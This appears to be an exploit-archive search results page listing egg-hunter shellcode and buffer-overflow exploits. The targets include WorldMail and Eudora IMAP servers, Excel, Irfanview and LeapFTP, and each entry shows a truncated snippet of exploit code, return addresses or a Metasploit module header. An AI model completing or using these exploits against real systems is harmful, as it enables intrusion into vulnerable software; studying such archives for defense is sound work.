69 matches found
Linux x86 Egg Hunter Shellcode 19 bytes
Linux x86 Egg Hunter Shellcode 19 bytes. Shellcode exploit for linx86 platform / Title: Linux x86 Egg Hunter Shellcode 19 bytes Date: 4 August 2015 Author: Guillaume Kaddouch Website: http://networkfilter.blogspot.com Twitter: @gkweb76 Tested on: Ubuntu 14.04.2 LTS x86, Kali Linux 1.0.9 x86 This...
linux/x86 Egg-hunter - 20 bytes
; Egg Hunter 20 bytes ; - searches from current addr towards lower memory ; - marker: 0x5159 push ecx,pop ecx ; Paw Petersen, SLAE-656 ; https://www.pawpetersen.dk/slae-assignment-3-egg-hunter-linux-x86/ global start section .text start: jmp callegghunter egghunter: pop ecx ; save addr ptr sub ec...
Linux x86 - Egg-hunter 20 bytes
Linux x86 - Egg-hunter 20 bytes. Shellcode exploit for linx86 platform ; Egg Hunter 20 bytes ; - searches from current addr towards lower memory ; - marker: 0x5159 push ecx,pop ecx ; Paw Petersen, SLAE-656 ; https://www.pawpetersen.dk/slae-assignment-3-egg-hunter-linux-x86/ global start section...
Excel-RTD-Memory-Corruption
Analysis: http://www.abysssec.com Vendor: http://www.microsoft.com Impact: Critical import sys def main: try: fdR = open'src.xls', 'rb+' strTotal = fdR.read str1 = strTotal:4509 str2 = strTotal5013:15000 str3 = strTotal15800: eip = "\xAd\x57\x00\x30" pop pop ret jmp = "\xF7\xC2\x03\x30" call esp...
Mercur Messaging 2005 IMAP Login Buffer Overflow
No description provided by source. $Id: mercurlogin.rb 10150 2010-08-25 20:55:37Z jduck $ This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms of use...
JITed egg-hunter stage-0 shellcode Adjusted universal for xp/vista/win7
No description provided by source. // JITed egg-hunter stage-0 shellcode // Permanent DEP bypass // // By Alexey Sintsov // [email protected] // [email protected] // // DSecRG - Digital Security Research Group dsecrg.com// // // TAG=3135330731353307 // its mean 0x07333531 twice! // // // This versi...
Magix Musik Maker 16 .mmm Stack Buffer Overflow
No description provided by source. $Id: magixmusikmaker16mmm.rb 12688 2011-05-22 23:41:15Z swtornio $ This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and...
NJStar Communicator 3.00 MiniSMTP Server Remote Exploit
No description provided by source. Exploit Title: NJStar Communicator 3.00 MiniSMTP Server Remote Exploit Date: 10/31/2011 Author: Dillon Beresford Twitter: https://twitter.com/!/D1N Software Link: http://www.njstar.com/download/njcom.exe Version: 3.00 and prior Build: 11818 and prior Tested on:...
WorldMail imapd 3.0 SEH overflow (egg hunter)
No description provided by source. !/usr/bin/python import sys import socket Exploit Title: WorldMail imapd 3.0 SEH overflow egg hunter Tested on: XP SP3 en-us Author: TheXero Website: www.thexero.co.uk http://www.nullsecurity.net Check for parameters if lensys.argv != 3: print Usage: + sys.argv0...
Eudora Qualcomm WorldMail 9.0.333.0 IMAPd Service UID - Buffer Overflow
Exploit for windows platform in category remote exploits !/usr/bin/python import sys,socket banner = """ Coded by: Muhammad EL Harmeel m.harmeelatgmaildotcom Details: - PRE AUTHENTICATION Eudora Qualcomm WorldMail 9.0.333.0 IMAPd Service Preauthentication Buffer Overflow. - Tested on: Windows...
Eudora Qualcomm WorldMail 9.0.333.0 - IMAPd Service UID Buffer Overflow
!/usr/bin/python Tested on 6.1.19.0 import sys,socket banner = """ Coded by: Muhammad Alharmeel Details: - PRE AUTHENTICATION Eudora Qualcomm WorldMail 9.0.333.0 IMAPd Service Preauthentication Buffer Overflow. - Tested on: Windows Server 2003 SP1. - SEH gets overwritten at 749 bytes when using U...
Linux/x86 - Egghunter (0x50905090) + Null-Free Shellcode (38 bytes)
Linux/x86 - Egghunter 0x50905090 + Null-Free Shellcode 38 bytes. Shellcode exploit for Linuxx86 platform / Egg Hunter Shellcode - C Language - Linux/x86 Copyright C 2013 Geyslan G. Bem, Hacking bits http://hackingbits.com [email protected] This program is free software: you can redistribute it...
Simple Web Server 2.2-rc2 Code Execution
use IO::Socket; Exploit Title: SWS 2.2-rc2 - Remote code execution Egghunting + ASLR bypass Date: 28/8/2012 Special Regards to Mr.pr0n ,Corelan team , immunity u guys are first !!! based on a POC by MR. Pr0n Author: Dhruval [email protected] Tested on Windows 7 32bit NOTE : If exploit is not...
Irfanview JPEG2000 4.3.2.0 jp2 Stack Buffer Overflow
$Id$ This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit web site for more information on licensing and terms of use. http://metasploit.com/ require 'msf/core' class Metasploit3 'Irfanview JPEG2000 %q This modul...
Irfanview JPEG2000 jp2 Stack Buffer Overflow
This module exploits a stack-based buffer overflow vulnerability in version 'Irfanview JPEG2000 jp2 Stack Buffer Overflow', 'Description' = %q This module exploits a stack-based buffer overflow vulnerability in version = 4.3.2.0 of Irfanview's JPEG2000.dll plugin. This exploit has been tested on ...
WorldMail imapd 3.0 SEH Overflow
!/usr/bin/python import sys import socket Exploit Title: WorldMail imapd 3.0 SEH overflow egg hunter Tested on: XP SP3 en-us Author: TheXero Website: www.thexero.co.uk http://www.nullsecurity.net Check for parameters if lensys.argv != 3: print "Usage: " + sys.argv0 + " 127.0.0.1 143" quit Assigns...
WorldMail imapd 3.0 SEH overflow (egg hunter)
Exploit for windows platform in category remote exploits !/usr/bin/python import sys import socket Exploit Title: WorldMail imapd 3.0 SEH overflow egg hunter Tested on: XP SP3 en-us Author: TheXero Website: www.thexero.co.uk http://www.nullsecurity.net Check for parameters if lensys.argv != 3:...
WorldMail IMAPd 3.0 - Remote Overflow (SEH) (Egghunter)
!/usr/bin/env python -- coding: latin-1 -- / / / / / / // / / -/ - / // / / / / // / ////,//////,// ///, / // nullsecurity team wm-imapd.py - WorldMail IMAPD remote exploit DATE 09/01/2012 DESCRIPTION WorldMail IMAPD - SEH overflow - remote exploit AUTHOR TheXero -...
BS.Player 2.57 Buffer Overflow
+Exploit Title: Exploit Buffer Overfloe Bsplayer 2.57UNICODE-SEH +Date: 01\07\2010 +Author: C4SS!0 G0M3S +Software Link: http://www.bsplayer.com/services/downlad-free-bsplayer.php?type=2 +Version: 2.57 +Tested on: WIN-XP SP3 PORTUGUESE BRAZILIAN +CVE: N/A / Created By C4SS!0 G0M3S...
LeapFTP 3.0.1 Stack Buffer Overflow
$Id: leapftplistreply.rb 10660 2010-10-12 18:39:21Z jduck $ This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms of use...